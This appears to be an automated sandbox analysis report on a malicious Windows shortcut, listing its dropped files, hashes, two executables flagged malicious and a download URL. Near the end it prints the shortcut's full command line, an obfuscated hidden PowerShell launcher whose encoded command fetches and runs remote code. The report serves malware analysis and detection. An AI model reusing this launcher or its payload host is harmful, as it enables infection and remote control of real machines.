                                                                                    SSDEEP:96:BA2pen5BiCfuAE6A3kvhkvCCt8XQas3NDHeX2Qas3NDHe7:Bangv8ga40Xta407
                                                                                    MD5:C86689A2CE918D3034B3B2EDF2CC35B8
                                                                                    SHA1:F865FE333C1D8431BD54C4D5BE057CB8DB97F1D4
                                                                                    SHA-256:261A06D5BCC940D0ECC6D7BA499321133164FC21B48106FC9F22DF1B4476A38A
                                                                                    SHA-512:662494FBE3FC7CDAA66D3C01B6003032BD9D469A56FA90A33565BBFF32AC3A3B3BA6B82FA8E8D48E71125553AD747B42C0527BDAA4F92B1D326260EADC71E187
                                                                                    Malicious:false
                                                                                    Preview:...................................FL..................F.".. ......A.........1..z.:{.............................:..DG..Yr?.D..U..k0.&...&.........A....5j...1.......1......t...CFSF..1.....&W.<..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......&W.<hY.S.............................A.p.p.D.a.t.a...B.V.1.....hY.S..Roaming.@......&W.<hY.S...........................h..R.o.a.m.i.n.g.....\.1.....+YS6..MICROS~1..D......&W.<hY.S...........................RN.M.i.c.r.o.s.o.f.t.....V.1.....hY....Windows.@......&W.<hY.S...........................S..W.i.n.d.o.w.s.......1.....&W.<..STARTM~1..n......&W.<hY.S....................D.......b.S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....&W.<..Programs..j......&W.<hY.S....................@......+}.P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......&W.<hYM...........................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~2.LNK..^......&W.<hY.S....8...........

                                                                                    C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms~RF5a654b.TMP (copy)

                                                                                    Download File
                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):6222
                                                                                    Entropy (8bit):3.7201496262137024
                                                                                    Encrypted:false
                                                                                    SSDEEP:96:BA2pen5BiCfuAE6A3kvhkvCCt8XQas3NDHeX2Qas3NDHe7:Bangv8ga40Xta407
                                                                                    MD5:C86689A2CE918D3034B3B2EDF2CC35B8
                                                                                    SHA1:F865FE333C1D8431BD54C4D5BE057CB8DB97F1D4
                                                                                    SHA-256:261A06D5BCC940D0ECC6D7BA499321133164FC21B48106FC9F22DF1B4476A38A
                                                                                    SHA-512:662494FBE3FC7CDAA66D3C01B6003032BD9D469A56FA90A33565BBFF32AC3A3B3BA6B82FA8E8D48E71125553AD747B42C0527BDAA4F92B1D326260EADC71E187
                                                                                    Malicious:false
                                                                                    Preview:...................................FL..................F.".. ......A.........1..z.:{.............................:..DG..Yr?.D..U..k0.&...&.........A....5j...1.......1......t...CFSF..1.....&W.<..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......&W.<hY.S.............................A.p.p.D.a.t.a...B.V.1.....hY.S..Roaming.@......&W.<hY.S...........................h..R.o.a.m.i.n.g.....\.1.....+YS6..MICROS~1..D......&W.<hY.S...........................RN.M.i.c.r.o.s.o.f.t.....V.1.....hY....Windows.@......&W.<hY.S...........................S..W.i.n.d.o.w.s.......1.....&W.<..STARTM~1..n......&W.<hY.S....................D.......b.S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....&W.<..Programs..j......&W.<hY.S....................@......+}.P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......&W.<hYM...........................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~2.LNK..^......&W.<hY.S....8...........

                                                                                    C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\WFCXJD0YUYQT0O4FEVLQ.temp

                                                                                    Download File
                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):6222
                                                                                    Entropy (8bit):3.7227080715359704
                                                                                    Encrypted:false
                                                                                    SSDEEP:96:IAppen5BiCfuAA6A3kvhkvCCt8XQas3NDHeX2Qas3NDHe7:IXngb8ga40Xta407
                                                                                    MD5:847A59F254802BA69966E716B0373295
                                                                                    SHA1:E966CA7BEECC05E9F83B2CBF413988C40B5DB0F1
                                                                                    SHA-256:A0DFD88B345C589FF377CC4C751BA41BAF9A57F445A3D86CF7B854CE18B60AE0
                                                                                    SHA-512:EFEC65C3DC6A982E74044FBD14ADCCCCE124348FCFF7159325957B3E25B3D0602D1F8C84060372F8CEA5DAA8EA428D551E0C364F36B70771FB337A80097FEF7C
                                                                                    Malicious:false
                                                                                    Preview:...................................FL..................F.".. ......A....}`%..1..z.:{.............................:..DG..Yr?.D..U..k0.&...&.........A....5j...1..5....1......t...CFSF..1.....&W.<..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......&W.<hY.S.............................A.p.p.D.a.t.a...B.V.1.....hY.S..Roaming.@......&W.<hY.S...........................h..R.o.a.m.i.n.g.....\.1.....+YS6..MICROS~1..D......&W.<hY.S...........................RN.M.i.c.r.o.s.o.f.t.....V.1.....hY....Windows.@......&W.<hY.S...........................S..W.i.n.d.o.w.s.......1.....&W.<..STARTM~1..n......&W.<hY.S....................D.......b.S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....&W.<..Programs..j......&W.<hY.S....................@......+}.P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......&W.<hY.S..........................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~2.LNK..^......&W.<hY.S....8...........

                                                                                    C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\Z9PHEBY8DX352ABINAUG.temp

                                                                                    Download File
                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):6222
                                                                                    Entropy (8bit):3.7201496262137024
                                                                                    Encrypted:false
                                                                                    SSDEEP:96:BA2pen5BiCfuAE6A3kvhkvCCt8XQas3NDHeX2Qas3NDHe7:Bangv8ga40Xta407
                                                                                    MD5:C86689A2CE918D3034B3B2EDF2CC35B8
                                                                                    SHA1:F865FE333C1D8431BD54C4D5BE057CB8DB97F1D4
                                                                                    SHA-256:261A06D5BCC940D0ECC6D7BA499321133164FC21B48106FC9F22DF1B4476A38A
                                                                                    SHA-512:662494FBE3FC7CDAA66D3C01B6003032BD9D469A56FA90A33565BBFF32AC3A3B3BA6B82FA8E8D48E71125553AD747B42C0527BDAA4F92B1D326260EADC71E187
                                                                                    Malicious:false
                                                                                    Preview:...................................FL..................F.".. ......A.........1..z.:{.............................:..DG..Yr?.D..U..k0.&...&.........A....5j...1.......1......t...CFSF..1.....&W.<..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......&W.<hY.S.............................A.p.p.D.a.t.a...B.V.1.....hY.S..Roaming.@......&W.<hY.S...........................h..R.o.a.m.i.n.g.....\.1.....+YS6..MICROS~1..D......&W.<hY.S...........................RN.M.i.c.r.o.s.o.f.t.....V.1.....hY....Windows.@......&W.<hY.S...........................S..W.i.n.d.o.w.s.......1.....&W.<..STARTM~1..n......&W.<hY.S....................D.......b.S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....&W.<..Programs..j......&W.<hY.S....................@......+}.P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......&W.<hYM...........................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~2.LNK..^......&W.<hY.S....8...........

                                                                                    C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\fb3b0dbfee58fac8.customDestinations-ms (copy)

                                                                                    Download File
                                                                                    Process:C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):12
                                                                                    Entropy (8bit):0.41381685030363374
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:/l:
                                                                                    MD5:E4A1661C2C886EBB688DEC494532431C
                                                                                    SHA1:A2AE2A7DB83B33DC95396607258F553114C9183C
                                                                                    SHA-256:B76875C50EF704DBBF7F02C982445971D1BBD61AEBE2E4B28DDC58A1D66317D5
                                                                                    SHA-512:EFDCB76FB40482BC94E37EAE3701E844BF22C7D74D53AEF93AC7B6AE1C1094BA2F853875D2C66A49A7075EA8C69F5A348B786D6EE0FA711669279D04ADAAC22C
                                                                                    Malicious:false
                                                                                    Preview:............

                                                                                    C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                    Download File
                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):64
                                                                                    Entropy (8bit):0.34726597513537405
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:Nlll:Nll
                                                                                    MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                                                    SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                                                    SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                                                    SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                                                    Malicious:false
                                                                                    Preview:@...e...........................................................

                                                                                    C:\Windows\Temp\__PSScriptPolicyTest_55mvsuuf.3lg.ps1

                                                                                    Download File
                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    File Type:ASCII text, with no line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):60
                                                                                    Entropy (8bit):4.038920595031593
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                    Malicious:false
                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                    C:\Windows\Temp\__PSScriptPolicyTest_bzyrcdnz.zen.psm1

                                                                                    Download File
                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    File Type:ASCII text, with no line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):60
                                                                                    Entropy (8bit):4.038920595031593
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                    Malicious:false
                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                    C:\Windows\Temp\__PSScriptPolicyTest_enqfqshj.xih.ps1

                                                                                    Download File
                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    File Type:ASCII text, with no line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):60
                                                                                    Entropy (8bit):4.038920595031593
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                    Malicious:false
                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                    C:\Windows\Temp\__PSScriptPolicyTest_lenjwrth.pge.ps1

                                                                                    Download File
                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    File Type:ASCII text, with no line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):60
                                                                                    Entropy (8bit):4.038920595031593
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                    Malicious:false
                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                    C:\Windows\Temp\__PSScriptPolicyTest_pjoaj45q.nmi.psm1

                                                                                    Download File
                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    File Type:ASCII text, with no line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):60
                                                                                    Entropy (8bit):4.038920595031593
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                    Malicious:false
                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                    C:\Windows\Temp\__PSScriptPolicyTest_ronz1mpv.ear.psm1

                                                                                    Download File
                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    File Type:ASCII text, with no line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):60
                                                                                    Entropy (8bit):4.038920595031593
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                    Malicious:false
                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                    C:\Windows\Temp\__PSScriptPolicyTest_y2vqug45.d1r.psm1

                                                                                    Download File
                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    File Type:ASCII text, with no line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):60
                                                                                    Entropy (8bit):4.038920595031593
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                    Malicious:false
                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                    C:\Windows\Temp\__PSScriptPolicyTest_ywzqanzk.crz.ps1

                                                                                    Download File
                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    File Type:ASCII text, with no line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):60
                                                                                    Entropy (8bit):4.038920595031593
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                    Malicious:false
                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                    C:\Windows\Temp\deviceId.txt

                                                                                    Download File
                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):37
                                                                                    Entropy (8bit):4.185823555333621
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:1FvBhiaTin:Vhun
                                                                                    MD5:2E34892691A39C064B28C2196A4735CB
                                                                                    SHA1:3037D60AA679A60A2A690C9EB314C27E8DB33452
                                                                                    SHA-256:7E677E793E94E3C36E5016ABDA2CF6E6B9E3BA3AEC1DF05E77CC3771967D219E
                                                                                    SHA-512:63323EB0221FA1FE3A83C65F75803AEE76A338D0685E1036BFAB1EA95636E221471D7CC7CA0D040B8CB183A2F5F8C6C892AD65AF0EA87AA9EB4588E435FE0D81
                                                                                    Malicious:false
                                                                                    Preview:.ECA4E7F645CEABCF141D602CC3089672..

                                                                                    C:\Windows\Temp\file

                                                                                    Download File
                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):8351232
                                                                                    Entropy (8bit):6.870213524632391
                                                                                    Encrypted:false
                                                                                    SSDEEP:98304:c6ELl9Xn8eQO54RgwIL6gTayjL9rjX27v/tIDZaFaOgj:c6EHXBQbRE5Tayjhrj2QaFaOS
                                                                                    MD5:0F611184B8A15C73AD43B82BDE807849
                                                                                    SHA1:4FBE94B19F1C69BA5ED4EF6DE134FAEC1B5B7270
                                                                                    SHA-256:2E77D02BBB8C853FE46B0CDC0D98A96CEF2C3DCB58CD98906CB1A2306F3213A4
                                                                                    SHA-512:C02A1D9646C662AFBD722F67AE141B6C8B75417AB800A605E085A02B95AECE0372CC8BFB5931820D586928E1A2F0EC5BFA56DA8C7E7B7204FAA8ECF2ABD63C29
                                                                                    Malicious:false
                                                                                    Preview:L[......................A............................................... ..M. Uihr!qsnfs`l!b`oonu!cd!sto!ho!ENR!lned/...%.........v...................._...............Z.......Z...............Z.......[.......[......Shbi............QD..e......f..........#....(..F..G8...............A.............................q............a..........................................)..Y...i)..U....A.......q..E............Q......1...........................).....A.............^............................./udyu...y&.......)..................!..a/l`o`fde..:..A....:..-..............!..aixes`ude......F........................./se`u`..]>3...^..A3...F.............A..A/e`u`........Q...o....{.............A.../qe`u`..E....q........{.............A..A/srsb........A.......W~.............A..A/sdmnb.......Q.......]~.............A..C........................................................................................................................................................................................

                                                                                    C:\Windows\Temp\log_rdp_08112024_05.txt

                                                                                    Download File
                                                                                    Process:C:\Windows\Temp\myRdpService.exe
                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):293
                                                                                    Entropy (8bit):4.435470091422429
                                                                                    Encrypted:false
                                                                                    SSDEEP:6:sLVbZTeAXI4WcdB4wcdqWALfTdAXI4WcdB4wcdqWALfTxKAXI4WcdB4wcdqWAn:sniAXxWMrWANAXxWMrWABKAXxWMrWAn
                                                                                    MD5:E66210CC180CB1B13CF460B6D3595C53
                                                                                    SHA1:954D6715FDE8CD4A953C3B02095B79F7ACB4C497
                                                                                    SHA-256:AF43473F919E22151263FC6C793A43B7B886C1BDDB8FF25169D6111BCDB366FA
                                                                                    SHA-512:739CA2C405DD14FB56648928EC9E11CAE3FBE9BB652B3494D5F6919036160E953C01AD25C09664DB98B8DF9B4A618E87DB46C6D5622846995D3BFD8A20CCB85D
                                                                                    Malicious:false
                                                                                    Preview:17:31:13 - Internet connection..17:31:24 - The server returned status code '404' when status code '101' was expected...17:31:27 - The server returned status code '404' when status code '101' was expected...17:31:40 - The server returned status code '404' when status code '101' was expected...

                                                                                    C:\Windows\Temp\myRdpService.exe

                                                                                    Download File
                                                                                    Process:C:\Windows\Temp\svczHost.exe
                                                                                    File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):9427456
                                                                                    Entropy (8bit):6.890384949334134
                                                                                    Encrypted:false
                                                                                    SSDEEP:98304:FagXMQc5xC9yZAaynfX9lvlJIg/EX4AAXC06GM3NOC02kf:DXMNYyGft7JIg/dAAXkGcu2
                                                                                    MD5:F651568CD1F1A7ABAEDD4389DA3A2F14
                                                                                    SHA1:44C482F52EE997816D2582CF1D1C0A5295BA8DC9
                                                                                    SHA-256:5B570471125EA0A0E5E693AB8493381A59E08C909472B461A9B1FF007CD1BB12
                                                                                    SHA-512:4BDA0642A063BFE3B86FF97C2F7500910BEA416507B9814C0DDAC0631B1B30ED47DCC6E22752B6566353B4F7386522A6E3C104B3EB055C5BA938522ED095B429
                                                                                    Malicious:true
                                                                                    Joe Sandbox View:
                                                                                    • Filename: EERNI7eIS7.lnk, Detection: malicious, Browse
                                                                                    • Filename: cOOhDuNWt7.lnk, Detection: malicious, Browse
                                                                                    • Filename: O5PR3i6ILA.lnk, Detection: malicious, Browse
                                                                                    • Filename: SPENDINGONDIGITALMARKETING_DIGITALMARKETINGBUDGET lnk.lnk, Detection: malicious, Browse
                                                                                    • Filename: aQuwmiym51.lnk, Detection: malicious, Browse
                                                                                    • Filename: gW6FHWNFzR.lnk, Detection: malicious, Browse
                                                                                    • Filename: U82W1yZAYQ.lnk, Detection: malicious, Browse
                                                                                    • Filename: ZGMW2wgPzY.lnk, Detection: malicious, Browse
                                                                                    • Filename: z0gG2GA9vG.lnk, Detection: malicious, Browse
                                                                                    • Filename: About-Us.docx lnk.lnk, Detection: malicious, Browse
                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........6 ..Xs..Xs..Xs...s..Xs..Yr..Xs..Ys,.Xs..[r..Xs..\r..Xs..]r..Xs..\r..Xs..Xs..Xs..]r.Xs..Xr..Xs..Zr..XsRich..Xs................PE..d...UR+g.........."....).:P...A................@.............................@............`...................................................|........................... ..L...............................(...P...@.............l..............................text....G.......H.................. ..`.managed..C..`....C..L.............. ..`hydrated.....`P..........................rdata..pq9...l..r9..>P.............@..@.data....x..........................@....pdata..............6..............@..@.rsrc...............................@..@.reloc..L.... .....................@..B................................................................................................................................................................

                                                                                    C:\Windows\Temp\svczHost.exe

                                                                                    Download File
                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):8351232
                                                                                    Entropy (8bit):6.8702135246323905
                                                                                    Encrypted:false
                                                                                    SSDEEP:98304:3qyaZJr8q0SLK/1JQv6udEr3onGwuNztOqZ+:6BgqrKNwvdK3iGwgOqZ
                                                                                    MD5:EB57894A8FF610DF55C97E427D0DDD7B
                                                                                    SHA1:B53BD3683487B873D1D4D0077C432698702CC347
                                                                                    SHA-256:41310862773697FF00306B143FFDA60C87D2EA4E44774289F1F2ED0E74D2CF1B
                                                                                    SHA-512:E7FC0571CB0BA516794A52A3277D3CB15049FFB739EBC203D80E6F9FCD08F6B5848AF470BA0F082A3D039472A83ED87512C0E4750946406649097C097EECFF40
                                                                                    Malicious:true
                                                                                    Antivirus:
                                                                                    • Antivirus: ReversingLabs, Detection: 16%
                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........w....................^...............[.......[...............[.......Z.......Z......Rich............PE..d......g.........."....)..G..F9...............@.............................p............`..........................................(..X...h(..T....@.......p..D............P......0...........................(.......@............._..............................text...x'.......(.................. ..`.managed..;..@....;..,.............. ..`hydrated......G..........................rdata..\?2..._..@2...G.............@..@.data........P...n....z.............@....pdata..D....p........z.............@..@.rsrc........@.......V..............@..@.reloc.......P.......\..............@..B........................................................................................................................................................................................

                                                                                    \Device\ConDrv

                                                                                    Download File
                                                                                    Process:C:\Windows\Temp\svczHost.exe
                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):69
                                                                                    Entropy (8bit):4.938912508890667
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:eDLpHWf0wUWdhtq1OKxxTsov:eDLp2f0cdht6dTsov
                                                                                    MD5:8FF2D24671F7C75BC5D6308CB376C56A
                                                                                    SHA1:90BCAFA8A3B00641A37EE0FAA94EEB38449EAE35
                                                                                    SHA-256:30FD8B376D525C5920CE1D02C1047F92B98F53B4D5DEAC3F3669246FB0514063
                                                                                    SHA-512:67CE88A7D57F99F7811B4FC9E8A90C1FC9146E45579A13A33CE2362FC2BDCC39666CAD0C991836D05BCB9AD82A7A3486540D2B5B789CC677FE9A162828AE735F
                                                                                    Malicious:false
                                                                                    Preview:Begin download https://uyt1n8ded9fb380.com/StaticFile/RdpService/54..

                                                                                    Static File Info

                                                                                    General

                                                                                    File type:MS Windows shortcut, Has Working directory, Has command line arguments, Icon number=347, ctime=Sun Dec 31 23:25:52 1600, mtime=Sun Dec 31 23:25:52 1600, atime=Sun Dec 31 23:25:52 1600, length=0, window=hide
                                                                                    Entropy (8bit):8.60886828459195E-4
                                                                                    TrID:
                                                                                    • Windows Shortcut (20020/1) 100.00%
                                                                                    File name:eQwUFcwrXk.lnk
                                                                                    File size:17'825'792 bytes
                                                                                    MD5:16d399755e964c4538d17e4b30d73425
                                                                                    SHA1:198e642d29413557ae29704cf1fc95f182b56ffc
                                                                                    SHA256:d3aa737d9a25d1452772006ad3f67feded40fd052816274a17f37ac87ffb0b04
                                                                                    SHA512:93b7a4775f454d2f0cbbc6f0696ee36626c4e5236aac3adba6ff90e4ba6741732ed9b63d6e7b887576bfb1af33081f6371fa61a886cb6762810696f61e6d2531
                                                                                    SSDEEP:48:8itEY7F6rAmDgP+5/o34A+5MwJDrOcUVQF4QXslInx4OqI:8itEkF6U4gGBHOwJyXmslwOh
                                                                                    TLSH:4907080069FA00CAE2239B365FF8F6B761B6F4A0192EA1F8514089194B71984C832B76
                                                                                    File Content Preview:L..................F.B..................................[.......................C./.v. ./.k. .".s.^.t.^.a.R.T. ./.M.I.^.N. .".". .p.O.W.e.^.R.s.^.h.e.L.^.L. .-.W. .h.I.d.^.d.e.n. .-.n.^.o.^.l.O.g.^.o. .-.n.^.o.P. .-.E.^.P. .B.y.^.P.a.s.s. .-.e.^.n.c.^.o.D

                                                                                    File Icon

                                                                                    Icon Hash:69e9a9a9a3a3a1a5

                                                                                    Static Windows Shortcut Info

                                                                                    General

                                                                                    Relative Path:
                                                                                    Command Line Argument:/v /k "s^t^aRT /MI^N "" pOWe^Rs^heL^L -W hId^den -n^o^lOg^o -n^oP -E^P By^Pass -e^nc^oDE^D^cOm^m^a^n^d "SQBFAFgAIAAoAFsAVABFAFgAdAAuAEUAbgBDAG8AZABJAE4AZwBdADoAOgBVAFQARgA4AC4ARwBFAFQAUwBUAHIAaQBuAGcAKAAoAEkAVwByACAAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIAYQBIAFIAMABjAEgATQA2AEwAeQA5ADEAZQBYAFEAeABiAGoAaABrAFoAVwBRADUAWgBtAEkAegBPAEQAQQB1AFkAMgA5AHQATAAwAHAANABVADIAdABZAE4AZwA9AD0AIgApACkAKQApAC4AQwBPAG4AVABlAE4AdAApACkA"" && exit
                                                                                    Icon location:%SystemRoot%\System32\imageres.dll

                                                                                    Network Behavior

                                                                                    Suricata IDS Alerts

                                                                                    TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
